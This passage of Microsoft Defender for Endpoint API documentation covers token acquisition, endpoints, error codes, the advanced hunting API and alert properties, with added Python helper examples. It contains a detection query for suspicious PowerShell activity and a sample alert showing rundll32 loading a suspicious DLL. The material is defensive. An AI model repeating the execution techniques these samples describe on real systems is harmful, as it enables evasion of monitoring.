application manifest editor to change the supported account types.

Redirect URI (optional) - Select the type of app you're building, Web or
Public client (mobile & desktop), and then enter the redirect URI (or reply
URL) for your application.

For web applications, provide the base URL of your app. For example,
http://localhost:31544 might be the URL for a web app running on your
local machine. Users would use this URL to sign in to a web client
application.

For public client applications, provide the URI used by Microsoft Entra ID
to return token responses. Enter a value specific to your application, such
as myapp://auth.

To see specific examples for web applications or native applications, check
out our quickstarts.

When finished, select Register.

4. Allow your Application to access Microsoft Defender for Endpoint and assign it
'Read alerts' permission:

On your application page, select API Permissions > Add permission > APIs
my organization uses > type WindowsDefenderATP and select
WindowsDefenderATP.

Note

WindowsDefenderATP does not appear in the original list. Start typing its
name in the text box to see it appear.

Choose Delegated permissions > Alert.Read > select Add permissions.

Important

Select the relevant permissions. Read alerts is only an example.

For example:

To run advanced queries, select the Run advanced queries permission.

To isolate a device, select the Isolate machine permission.

To determine which permission you need, view the Permissions section of the
API you want to call.

Select Grant consent.

Note

Every time you add a permission, you must select Grant consent for the
new permission to take effect.

5. Write down your application ID and your tenant ID.

On your application page, go to Overview and copy the following information:

Get an access token

For more information on Microsoft Entra tokens, see the Microsoft Entra tutorial.

Using C#

Copy/paste the class below into your application.
Use the AcquireUserTokenAsync method with your application ID, tenant ID, user
name, and password to acquire a token.

C#

namespace WindowsDefenderATP
{
    using System;
    using System.Net.Http;
    using System.Text;
    using System.Threading.Tasks;
    using Newtonsoft.Json.Linq;

    public static class WindowsDefenderATPUtils
    {
        private const string Authority = "https://login.microsoftonline.com";

        private const string WdatpResourceId = "https://api.securitycenter.microsoft.com";

        // Acquires a delegated (on-behalf-of-user) token with the resource owner
        // password credentials grant: the user's password is sent straight to the
        // token endpoint, so the caller is responsible for protecting it.
        public static async Task<string> AcquireUserTokenAsync(string username, string password, string appId, string tenantId)
        {
            using (var httpClient = new HttpClient())
            {
                // Form-encode every value: a password or secret containing '&' or '%'
                // would otherwise corrupt the request body.
                var urlEncodedBody =
                    $"resource={Uri.EscapeDataString(WdatpResourceId)}" +
                    $"&client_id={Uri.EscapeDataString(appId)}" +
                    "&grant_type=password" +
                    $"&username={Uri.EscapeDataString(username)}" +
                    $"&password={Uri.EscapeDataString(password)}";

                var stringContent = new StringContent(urlEncodedBody, Encoding.UTF8, "application/x-www-form-urlencoded");

                using (var response = await httpClient.PostAsync($"{Authority}/{tenantId}/oauth2/token", stringContent).ConfigureAwait(false))
                {
                    response.EnsureSuccessStatusCode();

                    var json = await response.Content.ReadAsStringAsync().ConfigureAwait(false);

                    var jObject = JObject.Parse(json);

                    return jObject["access_token"].Value<string>();
                }
            }
        }
    }
}

Validate the token

Verify that you got a correct token:

Copy/paste the token you got in the previous step into JWT in order to decode
it.

Validate that you get a 'scp' claim with the desired app permissions.

In the screenshot below you can see a decoded token acquired from the app in the
tutorial:
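The two token steps (form the token request, then decode the token and check its permission claims) as an added, offline Python example that is not Microsoft's code. It serves both the application-context check for a 'roles' claim on the previous page and the delegated check for an 'scp' claim here. The JWTs it decodes are constructed, unsigned tokens so the script runs without a tenant, and the expected 'aud' value is assumed to be the API resource URI used on these pages.

```python
"""Form a client_credentials token request and sanity-check the returned JWT.

Added example, not Microsoft's code. The sample tokens are constructed and
unsigned; API_AUDIENCE is an assumption (the resource URI used on this page)."""
import base64
import json
import urllib.parse

TOKEN_ENDPOINT = "https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token"
DEFAULT_SCOPE = "https://api.securitycenter.microsoft.com/.default"
API_AUDIENCE = "https://api.securitycenter.microsoft.com"  # assumed 'aud' claim value


def client_credentials_request(tenant_id, app_id, app_secret, scope=DEFAULT_SCOPE):
    """Return (url, form_body) for the app-context client_credentials grant.

    The body is x-www-form-urlencoded, which is what the PowerShell and curl
    samples send; urlencode escapes the ':' and '/' characters in the scope."""
    body = urllib.parse.urlencode({
        "grant_type": "client_credentials",
        "client_id": app_id,
        "client_secret": app_secret,
        "scope": scope,
    })
    return TOKEN_ENDPOINT.format(tenant=tenant_id), body


def _b64url_decode(segment):
    """JWT segments are base64url without '=' padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_claims(token):
    """Decode a JWT payload WITHOUT verifying its signature, like jwt.ms does.

    Enough for the sanity check described on this page; anything that accepts a
    token must still validate signature, issuer, audience and expiry."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWT: expected header.payload.signature")
    return json.loads(_b64url_decode(parts[1]))


def granted_permissions(claims):
    """App tokens list permissions in 'roles' (a JSON list); delegated tokens list
    them in 'scp' (a space-separated string). Return both as one set."""
    roles = claims.get("roles") or []
    scopes = (claims.get("scp") or "").split()
    return set(roles) | set(scopes)


def check_token_permissions(token, required, audience=API_AUDIENCE):
    """Return (ok, reason): ok only if the token targets the API and carries
    every permission named in `required`."""
    claims = decode_jwt_claims(token)
    if claims.get("aud") != audience:
        return False, f"unexpected audience {claims.get('aud')!r}"
    missing = set(required) - granted_permissions(claims)
    if missing:
        return False, f"missing permissions: {sorted(missing)}"
    return True, "ok"


def _unsigned_jwt(claims):
    """Constructed, unsigned JWT (alg 'none') for this offline demo only."""
    def enc(obj):
        raw = json.dumps(obj, separators=(",", ":")).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()
    return f"{enc({'alg': 'none', 'typ': 'JWT'})}.{enc(claims)}."


# Constructed sample tokens: one application-context token, one on-behalf-of-user token.
APP_TOKEN = _unsigned_jwt({"aud": API_AUDIENCE,
                           "roles": ["Alert.Read.All", "AdvancedQuery.Read.All"]})
USER_TOKEN = _unsigned_jwt({"aud": API_AUDIENCE,
                            "scp": "Alert.Read AdvancedQuery.Read"})

if __name__ == "__main__":
    url, body = client_credentials_request("<tenant-id>", "<app-id>", "<app-secret>")
    print(url, body, sep="\n")
    print(check_token_permissions(APP_TOKEN, ["Alert.Read.All"]))
    print(check_token_permissions(USER_TOKEN, ["Machine.Isolate"]))
```

The audience check is what catches a token minted for a different resource (for example the Graph scope from the Warning on the advanced hunting page), which would otherwise fail only at call time with a 401.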

Use the token to access Microsoft Defender for Endpoint API

Choose the API you want to use - Supported Microsoft Defender for Endpoint
APIs.

Set the Authorization header in the HTTP request you send to "Bearer {token}"
(Bearer is the Authorization scheme).

The expiration time of the token is 1 hour (you can send more than one request
with the same token).

Example of sending a request to get a list of alerts using C#:

C#

using System.Net.Http;
using System.Net.Http.Headers;

var httpClient = new HttpClient();

var request = new HttpRequestMessage(HttpMethod.Get, "https://api.securitycenter.microsoft.com/api/alerts");

request.Headers.Authorization = new AuthenticationHeaderValue("Bearer", token);

var response = httpClient.SendAsync(request).GetAwaiter().GetResult();

// Do something useful with the response

See also
Microsoft Defender for Endpoint APIs
Access Microsoft Defender for Endpoint with application context


Supported Microsoft Defender for Endpoint APIs
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Important

Advanced hunting capabilities are not included in Defender for Business.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Endpoint URI and versioning

Endpoint URI

The service base URI is: https://api.securitycenter.microsoft.com

OData-based queries have the '/api' prefix. For example, to get Alerts you can
send a GET request to https://api.securitycenter.microsoft.com/api/alerts

Versioning

The API supports versioning.

The current version is V1.0.

To use a specific version, use this format:
https://api.securitycenter.microsoft.com/api/{Version}. For example:

https://api.securitycenter.microsoft.com/api/v1.0/alerts

If you don't specify any version (e.g. https://api.securitycenter.microsoft.com/api/alerts)
you will get the latest version.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Learn more about the individual supported entities that you can run API calls against,
and details such as HTTP request values, request headers and expected responses.

In this section

Topic - Description

Advanced Hunting methods - Run queries from API.

Alert methods and properties - Run API calls such as get alerts, create alert, update alert and more.

Export Assessment per-device methods and properties - Run API calls to gather vulnerability assessments on a per-device basis, such as export secure configuration assessment, export software inventory assessment, export software vulnerabilities assessment, and delta export software vulnerabilities assessment.

Automated investigation methods and properties - Run API calls such as get collection of Investigation.

Export device health methods and properties - Run API calls such as GET /api/public/avdeviceshealth.

Domain-related alerts - Run API calls such as get domain-related devices, domain statistics and more.

File methods and properties - Run API calls such as get file information, file related alerts, file related devices, and file statistics.

Indicators methods and properties - Run API calls such as get Indicators, create Indicator, and delete Indicators.

IP-related alerts - Run API calls such as get IP-related alerts and get IP statistics.

Machine methods and properties - Run API calls such as get devices, get devices by ID, information about logged on users, edit tags and more.

Machine Action methods and properties - Run API calls such as Isolation, Run anti-virus scan and more.

Recommendation methods and properties - Run API calls such as get recommendation by ID.

Remediation activity methods and properties - Run API calls such as get all remediation tasks, get exposed devices remediation task and get one remediation task by ID.

Score methods and properties - Run API calls such as get exposure score or get device secure score.

Software methods and properties - Run API calls such as list vulnerabilities by software.

User methods and properties - Run API calls such as get user-related alerts and user-related devices.

Vulnerability methods and properties - Run API calls such as list devices by vulnerability.

See also
Microsoft Defender for Endpoint APIs

Microsoft Defender for Endpoint API release notes


Handling REST API errors
Article • 09/27/2023

HTTP error responses are divided into two categories:

Client error (400-level) – the client sent an invalid request or the request isn't
in accordance with definitions.
Server error (500-level) – the server temporarily failed to fulfill the request or a
server error occurred. Try sending the HTTP request again.

The error codes listed in the following table may be returned by an operation on any of
the Microsoft Defender for Endpoint APIs.

In addition to the error code, every error response contains an error message,
which can help resolve the problem.
The message is free text that can change, so key client logic off the error code
rather than the message wording.
At the bottom of the page, you can find response examples.

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Defender for Endpoint? Sign up for a free trial.

Error code - HTTP status code - Message

BadRequest - BadRequest (400) - General Bad Request error message.

ODataError - BadRequest (400) - Invalid OData URI query (the specific error is specified).

InvalidInput - BadRequest (400) - Invalid input {the invalid input}.

InvalidRequestBody - BadRequest (400) - Invalid request body.

InvalidHashValue - BadRequest (400) - Hash value {the invalid hash} is invalid.

InvalidDomainName - BadRequest (400) - Domain name {the invalid domain} is invalid.

InvalidIpAddress - BadRequest (400) - IP address {the invalid IP} is invalid.

InvalidUrl - BadRequest (400) - URL {the invalid URL} is invalid.

MaximumBatchSizeExceeded - BadRequest (400) - Maximum batch size exceeded. Received: {batch size received}, allowed: {batch size allowed}.

MissingRequiredParameter - BadRequest (400) - Parameter {the missing parameter} is missing.

OsPlatformNotSupported - BadRequest (400) - OS Platform {the client OS Platform} isn't supported for this action.

ClientVersionNotSupported - BadRequest (400) - {The requested action} is supported on client version {supported client version} and above.

Unauthorized - Unauthorized (401) - Unauthorized (invalid or expired authorization header).

Forbidden - Forbidden (403) - Forbidden (valid token but insufficient permission for the action).

DisabledFeature - Forbidden (403) - Tenant feature isn't enabled.

DisallowedOperation - Forbidden (403) - {the disallowed operation and the reason}.

NotFound - Not Found (404) - General Not Found error message.

ResourceNotFound - Not Found (404) - Resource {the requested resource} wasn't found.

TooManyRequests - Too Many Requests (429) - Response represents reaching quota limit either by number of requests or by CPU.

InternalServerError - Internal Server Error (500) - (No error message, retry the operation.)

Throttling

The HTTP client may receive a 'Too Many Requests error (429)' when the number of
HTTP requests in a given time frame exceeds the allowed number of calls per API.

The HTTP client should delay resubmitting further HTTPS requests and then submit
them in a way that complies with the rate limitations. A Retry-After response header
indicates how long to wait (in seconds) before making a new request.

Ignoring the 429 response or trying to resubmit HTTP requests in a shorter time frame
returns the 429 error code again.

Body parameters are case-sensitive

The submitted body parameters are currently case-sensitive.

If you experience an InvalidRequestBody or MissingRequiredParameter error, it might
be caused by a wrong upper-case or lower-case letter in a parameter name.

Review the API documentation page and check that the submitted parameters match
the relevant example.

Correlation request ID

Each error response contains a unique ID parameter for tracking.

The property name of this parameter is "target".

When contacting us about an error, attaching this ID helps find the root cause of the
problem.
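The client-side handling this page calls for (honor Retry-After on 429, retry 5xx, never blindly resend a 4xx, and surface the "target" correlation ID), together with the URI rules from the Supported APIs page (base URI, '/api' prefix, optional version, regional hosts), as one added Python example that is not Microsoft's SDK. Responses are scripted in-process so it runs offline; the status codes, Retry-After values and the "demo-0001" target ID are constructed, while the ResourceNotFound body is the example from this page.

```python
"""Minimal Defender for Endpoint API client loop with error handling.

Added example, not Microsoft's SDK. Transports are scripted so this runs offline;
DEMO_SCRIPT values are constructed for the demo."""
import json
import time
import urllib.error
import urllib.request

BASE_HOST = "https://api.securitycenter.microsoft.com"
REGIONAL_HOSTS = {r: f"https://api-{r}.securitycenter.microsoft.com" for r in ("us", "eu", "uk", "au")}


def api_url(resource, version=None, region=None):
    """'/api' prefix, optional explicit version (e.g. 'v1.0'), optional regional host."""
    host = REGIONAL_HOSTS[region] if region else BASE_HOST
    return f"{host}/api/{version}/{resource}" if version else f"{host}/api/{resource}"


class ApiError(Exception):
    """Carries the error code, message and the 'target' correlation ID for support."""
    def __init__(self, status, code, message, target):
        super().__init__(f"HTTP {status} {code}: {message} (target={target})")
        self.status, self.code, self.message, self.target = status, code, message, target


def parse_error(status, body):
    """Build an ApiError from an error body; tolerate empty or non-JSON bodies (e.g. 500)."""
    try:
        err = json.loads(body).get("error", {})
    except (ValueError, AttributeError):
        err = {}
    return ApiError(status, err.get("code", "Unknown"), err.get("message", ""), err.get("target"))


def call_with_retry(send, max_attempts=4, sleep=time.sleep):
    """Call `send()` -> (status, headers, body) until it succeeds or attempts run out.

    429: wait for Retry-After seconds (fall back to exponential backoff if absent).
    5xx: retry with exponential backoff.
    Other 4xx: raise at once, since resending an invalid request cannot help."""
    delay = 1.0
    for attempt in range(1, max_attempts + 1):
        status, headers, body = send()
        if 200 <= status < 300:
            return json.loads(body) if body else None
        if status == 429:
            wait = float(headers.get("Retry-After", delay))
        elif status >= 500:
            wait = delay
        else:
            raise parse_error(status, body)
        if attempt == max_attempts:
            raise parse_error(status, body)
        sleep(wait)
        delay *= 2
    raise AssertionError("unreachable")


def urllib_sender(url, token):
    """Real transport: a zero-argument callable for call_with_retry that sends an
    authenticated GET with urllib (not exercised by the offline demo)."""
    def send():
        req = urllib.request.Request(url, headers={"Authorization": f"Bearer {token}"})
        try:
            with urllib.request.urlopen(req) as resp:
                return resp.status, dict(resp.headers), resp.read().decode()
        except urllib.error.HTTPError as e:
            return e.code, dict(e.headers), e.read().decode()
    return send


def scripted_sender(script):
    """Constructed transport for the demo: replays (status, headers, body) tuples."""
    it = iter(script)
    return lambda: next(it)


# Constructed sequence: throttled, then a transient server error, then success.
DEMO_SCRIPT = [
    (429, {"Retry-After": "2"},
     '{"error":{"code":"TooManyRequests","message":"Quota exceeded","target":"demo-0001"}}'),
    (500, {}, ""),
    (200, {}, '{"value":[{"id":"alert-1","severity":"Low"}]}'),
]
# The ResourceNotFound example from this page, replayed as a non-retryable error.
NOT_FOUND_SCRIPT = [
    (404, {}, '{"error":{"code":"ResourceNotFound","message":"Machine 123123123 was not found",'
              '"target":"43f4cb08-8fac-4b65-9db1-745c2ae65f3a"}}'),
]

if __name__ == "__main__":
    print(api_url("alerts", version="v1.0", region="eu"))
    print(call_with_retry(scripted_sender(DEMO_SCRIPT), sleep=lambda s: print(f"waiting {s}s")))
    try:
        call_with_retry(scripted_sender(NOT_FOUND_SCRIPT))
    except ApiError as e:
        print("report this target ID to support:", e.target)
```

To run against a real tenant, pass `urllib_sender(api_url("alerts"), token)` as `send`; the retry loop and error parsing are unchanged.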

Examples
JSON

{
"error": {
"code": "ResourceNotFound",
"message": "Machine 123123123 was not found",
"target": "43f4cb08-8fac-4b65-9db1-745c2ae65f3a"
}
}

JSON

{
"error": {
"code": "InvalidRequestBody",
"message": "Request body is incorrect",
"target": "1fa66c0f-18bd-4133-b378-36d76f3a2ba0"
}
}


Advanced hunting API
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 2

Warning

This advanced hunting API is an older version with limited capabilities. A more
comprehensive version of the advanced hunting API that can query more tables is
already available in the Microsoft Graph security API. See Advanced hunting using
Microsoft Graph security API.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Limitations

1. You can only run a query on data from the last 30 days.

2. The results include a maximum of 100,000 rows.

3. The number of executions is limited per tenant:

API calls: Up to 45 calls per minute, and up to 1,500 calls per hour.
Execution time: 10 minutes of running time every hour and 3 hours of
running time a day.

4. The maximal execution time of a single request is 200 seconds.

5. A 429 response represents reaching the quota limit either by number of requests or
by CPU. Read the response body to understand which limit was reached.

6. The maximum query result size of a single request can't exceed 124 MB. If
exceeded, an HTTP 400 Bad Request with the message "Query execution has
exceeded the allowed result size. Optimize your query by limiting the number of
results and try again" occurs.

Permissions

One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type - Permission - Permission display name

Application - AdvancedQuery.Read.All - Run advanced queries

Delegated (work or school account) - AdvancedQuery.Read - Run advanced queries

Note

When obtaining a token using user credentials:

The user needs to have the View Data role assigned in Microsoft Entra ID
The user needs to have access to the device, based on device group settings
(See Create and manage device groups for more information)

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request

HTTP

POST https://api.securitycenter.microsoft.com/api/advancedqueries/run

Request headers

Header - Value

Authorization - Bearer {token}. Required.

Content-Type - application/json

Request body

In the request body, supply a JSON object with the following parameters:

Parameter - Type - Description

Query - Text - The query to run. Required.

Response

If successful, this method returns 200 OK, and a QueryResponse object in the response
body.

Example

Request example
Here's an example of the request.

HTTP

POST https://api.securitycenter.microsoft.com/api/advancedqueries/run

JSON
{
"Query":"DeviceProcessEvents
|where InitiatingProcessFileName =~ 'powershell.exe'
|where ProcessCommandLine contains 'appdata'
|project Timestamp, FileName, InitiatingProcessFileName, DeviceId
|limit 2"
}

Response example
Here's an example of the response.

Note

The response object shown here may be truncated for brevity. All of the properties
will be returned from an actual call.

JSON

{
"Schema": [
{
"Name": "Timestamp",
"Type": "DateTime"
},
{
"Name": "FileName",
"Type": "String"
},
{
"Name": "InitiatingProcessFileName",
"Type": "String"
},
{
"Name": "DeviceId",
"Type": "String"
}
],
"Results": [
{
"Timestamp": "2020-02-05T01:10:26.2648757Z",
"FileName": "csc.exe",
"InitiatingProcessFileName": "powershell.exe",
"DeviceId": "10cbf9182d4e95660362f65cfa67c7731f62fdb3"
},
{
"Timestamp": "2020-02-05T01:10:26.5614772Z",
"FileName": "csc.exe",
"InitiatingProcessFileName": "powershell.exe",
"DeviceId": "10cbf9182d4e95660362f65cfa67c7731f62fdb3"
}
]
}
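The request and response above, worked end to end as an added Python example that is not Microsoft's code: it builds the POST body with the case-sensitive "Query" key and turns the QueryResponse into typed rows using its Schema. The response embedded below is the sample from this page, so the script runs offline; the non-DateTime Kusto type names in the converter table are an assumption.

```python
"""Build an advanced hunting request and convert the QueryResponse into typed rows.

Added example, not Microsoft's code. SAMPLE_RESPONSE is the sample from this
page; the Int32/Int64/Boolean converter entries are assumed type names."""
import json
from collections import Counter
from datetime import datetime, timezone

HUNTING_URI = "https://api.securitycenter.microsoft.com/api/advancedqueries/run"

# The page's example query: children of PowerShell whose command line mentions 'appdata'.
QUERY = """DeviceProcessEvents
|where InitiatingProcessFileName =~ 'powershell.exe'
|where ProcessCommandLine contains 'appdata'
|project Timestamp, FileName, InitiatingProcessFileName, DeviceId
|limit 2"""


def hunting_request(query, token):
    """Return (headers, body) for POST HUNTING_URI.

    The body key is 'Query' with a capital Q: body parameters are case-sensitive,
    so 'query' would come back as InvalidRequestBody or MissingRequiredParameter."""
    headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
    return headers, json.dumps({"Query": query})


def parse_kusto_datetime(text):
    """Kusto emits 7 fractional digits ('...26.2648757Z'); Python keeps microseconds."""
    base, _, frac = text.rstrip("Z").partition(".")
    micro = int((frac + "000000")[:6]) if frac else 0
    return datetime.strptime(base, "%Y-%m-%dT%H:%M:%S").replace(microsecond=micro, tzinfo=timezone.utc)


# DateTime and String appear in the page's Schema; the rest are assumed names.
_CONVERTERS = {
    "DateTime": parse_kusto_datetime,
    "String": str,
    "Int32": int,
    "Int64": int,
    "Boolean": bool,
}


def rows_from_query_response(response):
    """Use the Schema to convert each Results object into typed Python values.

    Unknown types pass through unchanged and null stays None."""
    schema = {col["Name"]: col["Type"] for col in response["Schema"]}
    rows = []
    for raw in response["Results"]:
        row = {}
        for name, ktype in schema.items():
            value = raw.get(name)
            conv = _CONVERTERS.get(ktype)
            row[name] = conv(value) if (conv and value is not None) else value
        rows.append(row)
    return rows


def hits_per_device(rows):
    """Triage helper: how many matching events each device produced."""
    return Counter(r["DeviceId"] for r in rows)


# Sample response copied from this page (the docs note it may be truncated).
SAMPLE_RESPONSE = {
    "Schema": [
        {"Name": "Timestamp", "Type": "DateTime"},
        {"Name": "FileName", "Type": "String"},
        {"Name": "InitiatingProcessFileName", "Type": "String"},
        {"Name": "DeviceId", "Type": "String"},
    ],
    "Results": [
        {"Timestamp": "2020-02-05T01:10:26.2648757Z", "FileName": "csc.exe",
         "InitiatingProcessFileName": "powershell.exe",
         "DeviceId": "10cbf9182d4e95660362f65cfa67c7731f62fdb3"},
        {"Timestamp": "2020-02-05T01:10:26.5614772Z", "FileName": "csc.exe",
         "InitiatingProcessFileName": "powershell.exe",
         "DeviceId": "10cbf9182d4e95660362f65cfa67c7731f62fdb3"},
    ],
}

if __name__ == "__main__":
    headers, body = hunting_request(QUERY, "<token>")
    print(body)
    rows = rows_from_query_response(SAMPLE_RESPONSE)
    for row in rows:
        print(row["Timestamp"].isoformat(), row["FileName"],
              row["InitiatingProcessFileName"], row["DeviceId"])
    print(hits_per_device(rows))
```

Driving conversions from the Schema rather than hard-coding column names means the same parser works for any query you project, which matters once you start feeding hunting results into scheduled detection jobs.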

Related articles
Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn

Microsoft Defender for Endpoint APIs introduction

Advanced Hunting from Portal

Advanced Hunting using PowerShell


Alert resource type
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 2

Note

For the full available Alerts API experience across all Microsoft Defender products,
visit: Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft
Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Methods

Method - Return Type - Description

Get alert - Alert - Get a single alert object

List alerts - Alert collection - List alert collection

Update alert - Alert - Update specific alert

Batch update alerts - (none) - Update a batch of alerts

Create alert - Alert - Create an alert based on event data obtained from Advanced Hunting

List related domains - Domain collection - List URLs associated with the alert

List related files - File collection - List the file entities that are associated with the alert

List related IPs - IP collection - List IPs that are associated with the alert

Get related machines - Machine - The machine that is associated with the alert

Get related users - User - The user that is associated with the alert

Properties

Property - Type - Description

ID - String - Alert ID.

title - String - Alert title.

description - String - Alert description.

alertCreationTime - Nullable DateTimeOffset - The date and time (in UTC) the alert was created.

lastEventTime - Nullable DateTimeOffset - The last occurrence of the event that triggered the alert on the same device.

firstEventTime - Nullable DateTimeOffset - The first occurrence of the event that triggered the alert on that device.

lastUpdateTime - Nullable DateTimeOffset - The date and time (in UTC) the alert was last updated.

resolvedTime - Nullable DateTimeOffset - The date and time in which the status of the alert was changed to Resolved.

incidentId - Nullable Long - The Incident ID of the Alert.

investigationId - Nullable Long - The Investigation ID related to the Alert.

investigationState - Nullable Enum - The current state of the Investigation. Possible values are: Unknown, Terminated, SuccessfullyRemediated, Benign, Failed, PartiallyRemediated, Running, PendingApproval, PendingResource, PartiallyInvestigated, TerminatedByUser, TerminatedBySystem, Queued, InnerFailure, PreexistingAlert, UnsupportedOs, UnsupportedAlertType, SuppressedAlert.

assignedTo - String - Owner of the alert.

rbacGroupName - String - Role-based access control device group name.

mitreTechniques - String - MITRE Enterprise technique ID.

relatedUser - String - Details of user related to a specific alert.

severity - Enum - Severity of the alert. Possible values are: UnSpecified, Informational, Low, Medium, and High.

status - Enum - Specifies the current status of the alert. Possible values are: Unknown, New, InProgress and Resolved.

classification - Nullable Enum - Specification of the alert. Possible values are: TruePositive, Informational, expected activity, and FalsePositive.

determination - Nullable Enum - Specifies the determination of the alert. Possible determination values for each classification are:
True positive: Multistage attack (MultiStagedAttack), Malicious user activity (MaliciousUserActivity), Compromised account (CompromisedUser) – consider changing the enum name in public API accordingly, Malware (Malware), Phishing (Phishing), Unwanted software (UnwantedSoftware), and Other (Other).
Informational, expected activity: Security test (SecurityTesting), Line-of-business application (LineOfBusinessApplication), Confirmed activity (ConfirmedUserActivity) - consider changing the enum name in public API accordingly, and Other (Other).
False positive: Not malicious (Clean) - consider changing the enum name in public API accordingly, Not enough data to validate (InsufficientData), and Other (Other).

category - String - Category of the alert.

detectionSource - String - Detection source.

threatFamilyName - String - Threat family.

threatName - String - Threat name.

machineId - String - ID of a machine entity that is associated with the alert.

computerDnsName - String - Machine fully qualified name.

aadTenantId - String - The Microsoft Entra ID.

detectorId - String - The ID of the detector that triggered the alert.

comments - List of Alert comments - Alert Comment object contains: comment string, createdBy string, and createTime date time.

Evidence - List of Alert evidence - Evidence related to the alert. See the following example.

Note

Around August 29, 2022, previously supported alert determination values (Apt and
SecurityPersonnel) will be deprecated and no longer available via the API.

Response example for getting single alert:

HTTP

GET https://api.securitycenter.microsoft.com/api/alerts/da637472900382838869_1364969609

JSON

{
"id": "da637472900382838869_1364969609",
"incidentId": 1126093,
"investigationId": null,
"assignedTo": null,
"severity": "Low",
"status": "New",
"classification": null,
"determination": null,
"investigationState": "Queued",
"detectionSource": "WindowsDefenderAtp",
"detectorId": "17e10bbc-3a68-474a-8aad-faef14d43952",
"category": "Execution",
"threatFamilyName": null,
"title": "Low-reputation arbitrary code executed by signed executable",
"description": "Binaries signed by Microsoft can be used to run low-
reputation arbitrary code. This technique hides the execution of malicious
code within a trusted process. As a result, the trusted process might
exhibit suspicious behaviors, such as opening a listening port or connecting
to a command-and-control (C&C) server.",
"alertCreationTime": "2021-01-26T20:33:57.7220239Z",
"firstEventTime": "2021-01-26T20:31:32.9562661Z",
"lastEventTime": "2021-01-26T20:31:33.0577322Z",
"lastUpdateTime": "2021-01-26T20:33:59.2Z",
"resolvedTime": null,
"machineId": "111e6dd8c833c8a052ea231ec1b19adaf497b625",
"computerDnsName": "temp123.middleeast.corp.microsoft.com",
"rbacGroupName": "A",
"aadTenantId": "a839b112-1253-6432-9bf6-94542403f21c",
"threatName": null,
"mitreTechniques": [
"T1064",
"T1085",
"T1220"
],
"relatedUser": {
"userName": "temp123",
"domainName": "DOMAIN"
},
"comments": [
{
"comment": "test comment for docs",
"createdBy": "secop123@contoso.com",
"createdTime": "2021-01-26T01:00:37.8404534Z"
}
],
"evidence": [
{
"entityType": "User",
"evidenceCreationTime": "2021-01-26T20:33:58.42Z",
"sha1": null,
"sha256": null,
"fileName": null,
"filePath": null,
"processId": null,
"processCommandLine": null,
"processCreationTime": null,
"parentProcessId": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"ipAddress": null,
"url": null,
"registryKey": null,
"registryHive": null,
"registryValueType": null,
"registryValue": null,
"accountName": "name",
"domainName": "DOMAIN",
"userSid": "S-1-5-21-11111607-1111760036-109187956-75141",
"aadUserId": "11118379-2a59-1111-ac3c-a51eb4a3c627",
"userPrincipalName": "temp123@microsoft.com",
"detectionStatus": null
},
{
"entityType": "Process",
"evidenceCreationTime": "2021-01-26T20:33:58.6133333Z",
"sha1": "ff836cfb1af40252bd2a2ea843032e99a5b262ed",
"sha256":
"a4752c71d81afd3d5865d24ddb11a6b0c615062fcc448d24050c2172d2cbccd6",
"fileName": "rundll32.exe",
"filePath": "C:\\Windows\\SysWOW64",
"processId": 3276,
"processCommandLine": "rundll32.exe
c:\\temp\\suspicious.dll,RepeatAfterMe",
"processCreationTime": "2021-01-26T20:31:32.9581596Z",
"parentProcessId": 8420,
"parentProcessCreationTime": "2021-01-26T20:31:32.9004163Z",
"parentProcessFileName": "rundll32.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"ipAddress": null,
"url": null,
"registryKey": null,
"registryHive": null,
"registryValueType": null,
"registryValue": null,
"accountName": null,
"domainName": null,
"userSid": null,
"aadUserId": null,
"userPrincipalName": null,
"detectionStatus": "Detected"
},
{
"entityType": "File",
"evidenceCreationTime": "2021-01-26T20:33:58.42Z",
"sha1": "8563f95b2f8a284fc99da44500cd51a77c1ff36c",
"sha256":
"dc0ade0c95d6db98882bc8fa6707e64353cd6f7767ff48d6a81a6c2aef21c608",
"fileName": "suspicious.dll",
"filePath": "c:\\temp",
"processId": null,
"processCommandLine": null,
"processCreationTime": null,
"parentProcessId": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"ipAddress": null,
"url": null,
"registryKey": null,
"registryHive": null,
"registryValueType": null,
"registryValue": null,
"accountName": null,
"domainName": null,
"userSid": null,
"aadUserId": null,
"userPrincipalName": null,
"detectionStatus": "Detected"
}
]
}

Related articles
Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn

Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.


List alerts API
Article • 02/22/2024

Applies to:

